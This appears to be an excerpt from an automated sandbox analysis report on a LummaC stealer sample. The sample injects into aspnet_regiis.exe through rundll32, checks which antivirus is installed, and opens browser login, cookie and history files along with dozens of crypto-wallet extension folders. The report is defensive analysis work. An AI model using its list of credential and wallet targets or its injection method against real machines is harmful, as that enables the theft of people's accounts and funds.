Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A71000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AB6000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AB9000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AC9000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29CD008	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A71000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AB6000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AB9000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AC9000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 43A008	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000002.2179059031.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000005.00000002.2179104070.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2135615827.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2164188299.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2167941219.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2167851060.00000000028C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6432, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe	String found in binary or memory: Wallets/Electrum-LTC
Source: aspnet_regiis.exe	String found in binary or memory: s/ElectronCash
Source: aspnet_regiis.exe	String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000009.00000003.2154648334.0000000002A6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: aspnet_regiis.exe	String found in binary or memory: Wallets/Exodus
Source: aspnet_regiis.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
